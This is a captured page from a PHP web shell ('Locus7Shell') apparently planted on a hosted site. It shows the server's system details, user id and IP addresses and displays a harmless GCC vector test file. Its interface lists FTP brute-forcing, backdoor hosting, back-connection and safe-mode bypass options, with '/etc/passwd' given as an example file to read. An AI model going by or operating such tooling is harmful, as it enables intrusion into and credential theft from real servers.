Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/gcc.dg/tree-ssa/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     vector-7.c (1.18 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* { dg-do run } */
/* { dg-options "-O3 -fdump-tree-optimized" } */

typedef __INT8_TYPE__ v16qi __attribute__((vector_size(16),may_alias,aligned(1)));
typedef __INT32_TYPE__ v4si __attribute__((vector_size(16),may_alias,aligned(1)));

const __INT32_TYPE__ x[8] = { 1, 2, 3, 4, 5, 6, 7, 8 };
const __INT8_TYPE__ y[32]
  = { 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15,
      16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31 };
const __INT32_TYPE__ z[8] = { [3] = 3, [1] = 1 };

int
main()
{
  v4si v1 = *(v4si *)(x + 1);
  for (unsigned i = 0; i < 4; ++i)
    if (v1[i] != (v4si) { 2, 3, 4, 5 }[i])
      __builtin_abort ();
  v4si v2 = *(v4si *)z;
  for (unsigned i = 0; i < 4; ++i)
    if (v2[i] != (v4si) { 0, 1, 0, 3 }[i])
      __builtin_abort ();
  v4si v3 = *(v4si *)(y + 1);
  for (unsigned i = 0; i < 4; ++i)
    if (v3[i] !=
#if __BYTE_ORDER__ == __ORDER_BIG_ENDIAN__
    (v4si) { 0x01020304, 0x05060708, 0x090a0b0c, 0x0d0e0f10 }[i]
#elif __BYTE_ORDER__ == __ORDER_LITTLE_ENDIAN__
    (v4si) { 0x04030201, 0x08070605, 0x0c0b0a09, 0x100f0e0d }[i]
#else
    v3[i]
#endif
       )
      __builtin_abort ();
  return 0;
}

/* { dg-final { scan-tree-dump-not "abort" "optimized" } } */

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.006 ]--